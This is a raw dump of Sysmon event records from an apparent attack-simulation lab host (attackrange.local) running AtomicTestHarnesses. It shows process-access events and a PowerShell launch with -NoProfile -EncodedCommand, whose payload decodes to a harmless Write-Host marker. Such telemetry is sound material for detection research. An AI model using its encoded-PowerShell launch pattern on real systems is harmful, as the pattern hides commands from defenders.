16:52:22.023{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235293Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.023{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235292Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.023{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235291Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.023{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235290Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.023{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235289Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.035{05ADC7E1-6D46-603E-65AA-00000000AD01}9584C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCo VwByAGkAdABlAC0ASABvAHMAdAAgAGQAYgA1ADAAOQBhADIAZAAtADAANwA3ADMALQA0ADkANQBiAC0AOAA2AGUAMgAtADkAYwA3ADEANgAzAGEAOAA0AGUAYQAxAA==C:\Users\Administrator\Downloads\AtomicTestHarnesses\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002235288Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:22.014{05ADC7E1-6D45-603E-64AA-00000000AD01}7444ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235406Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.923{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3053E22D4F42A3603934B4CA112BE65,SHA256=94381C1BD6801A41B608EAEABF88BF1E83539F28714975A9DF59F28216755979,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235405Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.762{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002235404Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.668{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235403Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.668{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235402Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.623{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235401Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.623{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002235400Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:23.606{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348\PSHost.132591775435073476.4348.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002235399Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.574{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_xwa5kyow.yd4.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235398Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.574{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_ft0h42bw.z1m.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002235397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.559{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F97ACE58945E18925D030CC47D81E600,SHA256=FCD4C4F8B10EB7C885F4EF28A2F7395DF296F3CB9DF8D17887B64C8AA3434783,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000002235396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.559{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_ft0h42bw.z1m.ps12021-03-02 16:52:23.559 10341000x80000000000000002235395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.543{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.496{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.496{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.496{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.496{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.496{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002235389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.496{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002235388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.496{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+700132a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b43b0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f49a232(wow64) 154100x80000000000000002235387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:23.507{05ADC7E1-6D47-603E-6AAA-00000000AD01}4348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -EncodedCommand 